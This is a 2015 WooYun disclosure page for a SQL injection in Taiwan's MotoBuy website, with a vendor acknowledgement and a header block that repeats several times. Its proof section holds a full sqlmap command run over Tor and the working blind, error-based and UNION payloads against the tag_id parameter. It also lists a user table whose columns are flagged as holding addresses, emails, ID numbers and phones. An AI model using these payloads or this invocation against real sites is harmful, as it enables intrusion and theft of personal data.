台湾MotoBuy网站 SQL 注入（臺灣地區） | wooyun-2015-0159620| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159620

漏洞标题：台湾MotoBuy网站 SQL 注入（臺灣地區）

漏洞作者：路人甲

提交时间：2015-12-10 15:43

修复时间：2016-01-25 18:01

公开时间：2016-01-25 18:01

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-10：细节已通知厂商并且等待厂商处理中
2015-12-14：厂商已经确认，细节仅向厂商公开
2015-12-24：细节向核心白帽子及相关领域专家公开
2016-01-03：细节向普通白帽子公开
2016-01-13：细节向实习白帽子公开
2016-01-25：细节向公众公开

简要描述：

台湾MotoBuy网站 SQL 注入

详细说明：

台湾MotoBuy网站 SQL 注入

漏洞证明：

$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N -u "**.**.**.**/p_info.php?tag_id=&post_id=63" --is-dba --dbs --current-db
---
Parameter: tag_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: tag_id=-6624 OR 3998=3998#&post_id=63
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: tag_id=-5680 OR 1 GROUP BY CONCAT(0x7162707071,(SELECT (CASE WHEN (6134=6134) THEN 1 ELSE 0 END)),0x716a7a6a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post_id=63
    Type: UNION query
    Title: Generic UNION query (N) - 17 columns
    Payload: tag_id=-1499 UNION ALL SELECT 'N','N','N','N',CONCAT(0x7162707071,0x4c667874645941424965,0x716a7a6a71),'N','N','N','N','N','N','N','N','N','N','N','N'-- &post_id=63
---
web application technology: Apache
back-end DBMS: MySQL 5
current database:    'DBL02699'
current user is DBA:    False
available databases [2]:
[*] DBL02699
[*] information_schema
Database: DBL02699
Table: active_user
[26 columns]
+------------------+---------------+
| Column           | Type          |
+------------------+---------------+
| act_id           | int(11)       |
| au_act_stat      | tinyint(11)   |
| au_address       | varchar(1024) |  ===> 可能是地址
| au_age_area      | int(11)       |
| au_birth         | varchar(32)   |
| au_bodycheck     | varchar(512)  |
| au_buydate       | varchar(512)  |
| au_buystore      | varchar(512)  |
| au_clothe_size   | varchar(32)   |
| au_email         | varchar(1024) |   ===> 可能是电邮
| au_giftform      | varchar(512)  |
| au_giftno        | varchar(512)  |
| au_id            | bigint(20)    |   ===> 可能是身分证
| au_idnum         | varchar(64)   |
| au_knowdetail    | varchar(512)  |
| au_mototype      | tinyint(4)    |
| au_mototype_text | varchar(1024) |
| au_msic          | tinytext      |
| au_name          | varchar(1024) |
| au_newsfrom      | varchar(512)  |
| au_newsfrom_text | varchar(512)  |
| au_photo         | varchar(1024) |
| au_productform   | varchar(512)  |
| au_registertime  | timestamp     |
| au_tel           | varchar(32)   |  ===> 可能是电话
| au_time_choice   | varchar(32)   |
+------------------+---------------+

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：17

确认时间：2015-12-14 16:11

厂商回复：

感謝通報

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159620

漏洞标题：台湾MotoBuy网站 SQL 注入（臺灣地區）

相关厂商：MotoBuy

漏洞作者：路人甲

提交时间：2015-12-10 15:43

修复时间：2016-01-25 18:01

公开时间：2016-01-25 18:01

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159620

漏洞标题：台湾MotoBuy网站 SQL 注入（臺灣地區）

相关厂商：MotoBuy

漏洞作者： 路人甲

提交时间：2015-12-10 15:43

修复时间：2016-01-25 18:01

公开时间：2016-01-25 18:01

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0159620"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云